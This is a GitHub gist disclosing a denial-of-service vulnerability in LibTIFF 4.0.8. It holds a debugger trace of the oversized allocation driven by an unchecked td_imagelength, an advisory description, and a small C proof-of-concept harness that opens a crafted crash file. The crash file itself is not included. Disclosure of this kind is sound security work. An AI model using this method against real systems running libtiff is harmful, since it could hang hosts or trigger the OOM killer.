Skip to content

Instantly share code, notes, and snippets.

@dazhouzhou dazhouzhou/TIFFOpen.c
Last active Jul 26, 2017

Embed
What would you like to do?
poc
----------------------------------------------------------------------------------------------------------------------------------------------[ source:tif_dirread.c+5701 ]----
5697 nstrips = TIFFhowmany_32(td->td_imagelength, rowsperstrip);
5698 if( nstrips == 0 )
5699 return;
5700
// tif=0x00007fffffffe028 -> [...] -> "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", newcounts=0x00007fffffffe040 -> 0x0000000020f222ec
->5701 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
5702 "for chopped \"StripByteCounts\" array");
5703 newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
5704 "for chopped \"StripOffsets\" array");
5705 if (newcounts == NULL || newoffsets == NULL) {
----------------------------------------------------------------------------------------------------------------------------------------------------------------[ threads ]----
[#0] Id 1, Name: "TIFFOpen", stopped, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------------------------------------------------------[ trace ]----
[#0] 0x418d42->Name: ChopUpSingleUncompressedStrip(tif=0x67b010)
[#1] 0x414d2f->Name: TIFFReadDirectory(tif=0x67b010)
[#2] 0x419f76->Name: TIFFClientOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r", clientdata=0x7fff00000003, readproc=0x4210b6 <_tiffReadProc>, writeproc=0x421184 <_tiffWriteProc>, seekproc=0x421252 <_tiffSeekProc>, closeproc=0x4212a9 <_tiffCloseProc>, sizeproc=0x4212c9 <_tiffSizeProc>, mapproc=0x421311 <_tiffMapProc>, unmapproc=0x4213a6 <_tiffUnmapProc>)
[#3] 0x421421->Name: TIFFFdOpen(fd=0x3, name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r")
[#4] 0x421528->Name: TIFFOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r")
[#5] 0x404afd->Name: main()
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5701 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
gef> p nstrips
$2 = 0x11223344
gef>
Title: LibTiff TIFFOpen Denial of Service Vulnerability
Version: V4.0.8
Credit: Yu Zhou of Ant-financial Light-Year Security Lab
Description
In LibTIFF 4.0.8, there is a denial of service vulnerability in the TIFFOpen function. A crafted input will lead to a denial of service attack.
During the TIFFOpen process, the td_imagelength does not be checked. The value of td_imagelength can be directly controlled by input file.
In ChopUpSingleUncompressedStrip function, here will call _TIFFCheckMalloc function based on td_imagelength. If we set the value of td_imagelength
close to system memory, it will hung the system or trigger OOM killer.
The vulnerability can affect a lot of the software(e.g, ImageMagick) or system(e.g, Debian) used libtiff library, because it can be triggered in TIFFOpen function.
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include "tiffio.h"
int main()
{
TIFF *tif;
tif = TIFFOpen("crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", "r");
if (tif == NULL)
{
printf("TIFFOpen error!\n");
return 0;
}
TIFFClose(tif);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.